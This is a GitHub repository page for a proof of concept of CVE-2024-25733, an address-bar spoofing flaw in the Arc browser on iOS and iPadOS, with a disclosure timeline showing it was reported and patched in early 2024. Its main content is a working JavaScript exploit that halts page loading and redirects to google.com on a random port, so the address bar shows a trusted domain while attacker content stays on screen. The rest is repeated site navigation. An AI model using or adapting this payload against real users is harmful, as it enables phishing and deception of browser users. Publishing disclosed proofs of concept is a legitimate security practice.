ARC Browser Address Bar Spoofing - iOS/iPadOS (CVE-2024-25733)

ARC Browser Address Bar Spoofing PoC - iOS/iPadOS

Exploit PoC (Proof of Concept)

<script>
    function spoof() {
        setTimeout(() => {
            window.stop();
            let randomPort;
            do {
                randomPort = Math.floor(Math.random() * 1000);
            } while (randomPort === 0 || randomPort === 443);
            document.location = "https://google.com:" + randomPort + "/";
        }, 300);
    }
    spoof();
</script>

DEMO

PoC.mp4

TimeLine

2024-01-25 : Vulnerability reported to The Browser Company of New York
2024-01-25 : Recognized as a security vulnerability
2024-02-13 : Patched in the latest release

Name		Name	Last commit message	Last commit date
Latest commit History 10 Commits
PoC.mp4		PoC.mp4
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

ARC Browser Address Bar Spoofing - iOS/iPadOS (CVE-2024-25733)

Exploit PoC (Proof of Concept)

DEMO

TimeLine

About

Releases

Packages

hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC

Folders and files

Latest commit

History

Repository files navigation

ARC Browser Address Bar Spoofing - iOS/iPadOS (CVE-2024-25733)

Exploit PoC (Proof of Concept)

DEMO

TimeLine

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages